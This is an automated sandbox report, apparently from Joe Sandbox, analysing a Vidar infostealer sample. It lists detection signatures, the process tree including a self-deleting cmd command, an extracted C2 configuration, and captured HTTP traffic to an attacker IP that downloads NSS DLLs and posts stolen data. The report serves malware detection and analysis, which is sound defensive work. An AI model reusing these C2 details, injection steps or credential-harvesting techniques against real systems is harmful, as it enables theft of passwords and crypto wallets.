Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1447265
MD5:22152460b13e4c2473dc3fcdea192933
SHA1:48ce4a69302e860cd905cd02a10aac942f09d9f3
SHA256:51cba9b4aefefaf72a791e1929f98553f50d643a22179a6aaac9d13f45ea8b43
Tags:exe
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Opens network shares
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5072 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 22152460B13E4C2473DC3FCDEA192933)
    • RegAsm.exe (PID: 4784 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • cmd.exe (PID: 5608 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KECBFBAEBKJJ" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 2244 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "c21b45a432889af65aa05cd66920d0a2", "Version": "9.8"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
        • 0x221f0:$s1: JohnDoe
        • 0x32f80:$s1: JohnDoe
        • 0x221e8:$s2: HAL9TH
        00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          Process Memory Space: file.exe PID: 5072JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              1.2.RegAsm.exe.400000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
              • 0x221f0:$s1: JohnDoe
              • 0x32f80:$s1: JohnDoe
              • 0x221e8:$s2: HAL9TH
              0.2.file.exe.3a7ac0.1.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                0.2.file.exe.3a7ac0.1.raw.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
                • 0x20df0:$s1: JohnDoe
                • 0x20de8:$s2: HAL9TH
                0.2.file.exe.3a7ac0.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  Click to see the 5 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  No Snort rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: file.exeAvira: detected
                  Found malware configuration
                  Source: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "c21b45a432889af65aa05cd66920d0a2", "Version": "9.8"}
                  Multi AV Scanner detection for submitted file
                  Source: file.exeReversingLabs: Detection: 42%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for sample
                  Source: file.exeJoe Sandbox ML: detected
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004062A5 CryptUnprotectData,LocalAlloc,LocalFree,1_2_004062A5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00406242 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_00406242
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004082DE memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,PK11_FreeSlot,lstrcat,1_2_004082DE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040245C memset,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,1_2_0040245C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00410DAC CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,1_2_00410DAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_6CC46C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,1_2_6CC46C80
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.6:49710 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.6:49711 version: TLS 1.2
                  Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                  Source: Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                  Source: Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                  Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                  Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
                  Source: Binary string: nss3.pdb source: RegAsm.exe, 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                  Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000001.00000002.2527728360.00000000132B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2534037920.0000000019228000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.1.dr
                  Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                  Source: Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00394303 FindFirstFileExW,0_2_00394303
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,1_2_00401162
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004162AF _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_004162AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004153F6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,1_2_004153F6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040B463 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040B463
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004094E5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_004094E5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040C679 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040C679
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00415AC2 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00415AC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00409F72 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_00409F72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00409900 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_00409900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040A981 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,1_2_0040A981
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00415E66 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,1_2_00415E66
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00415843 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,1_2_00415843
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior

                  Networking

                  barindex
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199689717899
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 104.102.42.29 104.102.42.29
                  Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKKFHCFIECAAAKEGCFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAAKJKJEBGHJKFHIDGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHJDBKJKFIECAAAKFBFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKEBAFIIECBGCAAAAFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 7885Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAKFCBFHJDHJKECAKEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCFIIEBKEGHJJJJJJDAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIEGCBKEGCFCBFIDBFIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 1025Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDHIDBFBFHIJKFHCGIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKJDHIEBFIIDGDGDBAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIJJDGDHDGDAKFIECFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKEHIECFCAAFIEBGIDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 98173Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKKFBGDHJKFHJJJJDGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEBKKKEHDHDGDGCFBKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.109.242.59
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040514C _EH_prolog,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,1_2_0040514C
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
